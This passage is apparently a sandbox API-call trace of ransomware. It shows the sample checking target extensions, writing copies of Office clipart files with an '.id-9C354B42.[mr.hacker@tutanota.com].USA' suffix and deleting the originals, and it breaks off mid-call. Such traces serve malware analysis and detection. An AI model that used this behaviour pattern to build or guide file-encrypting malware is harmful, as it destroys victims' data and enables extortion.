(lpString=".7z") returned 3 [0057.984] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0057.984] lstrlenW (lpString=".dbf") returned 4 [0057.984] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0057.984] lstrlenW (lpString=".1cd") returned 4 [0057.984] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 63 [0057.985] lstrlenW (lpString=".jpg") returned 4 [0057.985] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.985] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2644) returned 1 [0057.985] CloseHandle (hObject=0x1b4) returned 1 [0057.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf")) returned 0x20 [0057.985] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0057.985] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.985] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0057.986] GetLastError () returned 0x0 [0057.986] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xa54, lpOverlapped=0x0) returned 1 [0057.988] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xa60, lpOverlapped=0x0) returned 1 [0057.989] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.989] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.989] SetEndOfFile (hFile=0x248) returned 1 [0057.989] CloseHandle (hObject=0x248) returned 1 [0057.989] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.989] SetEndOfFile (hFile=0x1b4) returned 1 [0057.990] CloseHandle (hObject=0x1b4) returned 1 [0057.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.990] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf")) returned 1 [0057.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0057.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0057.990] lstrlenW (lpString=".doc") returned 4 [0057.990] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.990] lstrlenW (lpString=".docx") returned 5 [0057.990] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.990] lstrlenW (lpString=".pdf") returned 4 [0057.990] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.990] lstrlenW (lpString=".xls") returned 4 [0057.990] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.990] lstrlenW (lpString=".xlsx") returned 5 [0057.990] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.990] lstrlenW (lpString=".ppt") returned 4 [0057.990] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0057.991] lstrlenW (lpString=".zip") returned 4 [0057.991] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.991] lstrlenW (lpString=".rar") returned 4 [0057.991] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.991] lstrlenW (lpString=".bz2") returned 4 [0057.991] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.991] lstrlenW (lpString=".7z") returned 3 [0057.991] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0057.991] lstrlenW (lpString=".dbf") returned 4 [0057.991] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0057.991] lstrlenW (lpString=".1cd") returned 4 [0057.991] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0057.991] lstrlenW (lpString=".jpg") returned 4 [0057.991] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.991] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5272) returned 1 [0057.991] CloseHandle (hObject=0x1b4) returned 1 [0057.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf")) returned 0x20 [0057.991] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0057.992] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.992] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0057.992] GetLastError () returned 0x0 [0057.992] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1498, lpOverlapped=0x0) returned 1 [0057.994] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x14a0, lpOverlapped=0x0) returned 1 [0057.994] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.995] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.995] SetEndOfFile (hFile=0x248) returned 1 [0057.995] CloseHandle (hObject=0x248) returned 1 [0057.995] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.995] SetEndOfFile (hFile=0x1b4) returned 1 [0057.996] CloseHandle (hObject=0x1b4) returned 1 [0057.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf")) returned 1 [0057.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0057.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0057.996] lstrlenW (lpString=".doc") returned 4 [0057.996] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.996] lstrlenW (lpString=".docx") returned 5 [0057.996] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.996] lstrlenW (lpString=".pdf") returned 4 [0057.996] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.996] lstrlenW (lpString=".xls") returned 4 [0057.996] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.996] lstrlenW (lpString=".xlsx") returned 5 [0057.996] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.997] lstrlenW (lpString=".ppt") returned 4 [0057.997] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0057.997] lstrlenW (lpString=".zip") returned 4 [0057.997] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.997] lstrlenW (lpString=".rar") returned 4 [0057.997] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.997] lstrlenW (lpString=".bz2") returned 4 [0057.997] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.997] lstrlenW (lpString=".7z") returned 3 [0057.997] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0057.997] lstrlenW (lpString=".dbf") returned 4 [0057.997] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0057.997] lstrlenW (lpString=".1cd") returned 4 [0057.997] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0057.997] lstrlenW (lpString=".jpg") returned 4 [0057.997] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.998] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3016) returned 1 [0057.998] CloseHandle (hObject=0x1b4) returned 1 [0057.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf")) returned 0x20 [0057.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0057.998] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.998] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0057.999] GetLastError () returned 0x0 [0057.999] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xbc8, lpOverlapped=0x0) returned 1 [0058.000] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0058.001] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.001] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.001] SetEndOfFile (hFile=0x248) returned 1 [0058.001] CloseHandle (hObject=0x248) returned 1 [0058.001] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.001] SetEndOfFile (hFile=0x1b4) returned 1 [0058.002] CloseHandle (hObject=0x1b4) returned 1 [0058.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.002] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf")) returned 1 [0058.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0058.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0058.003] lstrlenW (lpString=".doc") returned 4 [0058.003] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.003] lstrlenW (lpString=".docx") returned 5 [0058.003] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.003] lstrlenW (lpString=".pdf") returned 4 [0058.003] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.003] lstrlenW (lpString=".xls") returned 4 [0058.003] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.003] lstrlenW (lpString=".xlsx") returned 5 [0058.003] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.003] lstrlenW (lpString=".ppt") returned 4 [0058.003] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0058.003] lstrlenW (lpString=".zip") returned 4 [0058.003] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.003] lstrlenW (lpString=".rar") returned 4 [0058.003] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.003] lstrlenW (lpString=".bz2") returned 4 [0058.003] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.003] lstrlenW (lpString=".7z") returned 3 [0058.003] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0058.003] lstrlenW (lpString=".dbf") returned 4 [0058.003] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0058.003] lstrlenW (lpString=".1cd") returned 4 [0058.003] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0058.003] lstrlenW (lpString=".jpg") returned 4 [0058.004] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.004] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3780) returned 1 [0058.004] CloseHandle (hObject=0x1b4) returned 1 [0058.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf")) returned 0x20 [0058.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0058.004] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.004] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0058.005] GetLastError () returned 0x0 [0058.005] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xec4, lpOverlapped=0x0) returned 1 [0058.006] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xed0, lpOverlapped=0x0) returned 1 [0058.007] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.007] WriteFile (in: hFile=0x248, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.007] SetEndOfFile (hFile=0x248) returned 1 [0058.007] CloseHandle (hObject=0x248) returned 1 [0058.007] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.007] SetEndOfFile (hFile=0x1b4) returned 1 [0058.008] CloseHandle (hObject=0x1b4) returned 1 [0058.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.008] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf")) returned 1 [0058.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0058.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0058.008] lstrlenW (lpString=".doc") returned 4 [0058.008] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.009] lstrlenW (lpString=".docx") returned 5 [0058.009] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.009] lstrlenW (lpString=".pdf") returned 4 [0058.009] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.009] lstrlenW (lpString=".xls") returned 4 [0058.009] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.009] lstrlenW (lpString=".xlsx") returned 5 [0058.009] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.009] lstrlenW (lpString=".ppt") returned 4 [0058.009] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0058.009] lstrlenW (lpString=".zip") returned 4 [0058.009] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.009] lstrlenW (lpString=".rar") returned 4 [0058.009] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.009] lstrlenW (lpString=".bz2") returned 4 [0058.009] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.009] lstrlenW (lpString=".7z") returned 3 [0058.009] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0058.009] lstrlenW (lpString=".dbf") returned 4 [0058.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0058.009] lstrlenW (lpString=".1cd") returned 4 [0058.009] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0058.009] lstrlenW (lpString=".jpg") returned 4 [0058.009] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.010] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=4164) returned 1 [0058.010] CloseHandle (hObject=0x1b4) returned 1 [0058.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf")) returned 0x20 [0058.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0058.010] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.010] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0058.010] GetLastError () returned 0x0 [0058.010] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1044, lpOverlapped=0x0) returned 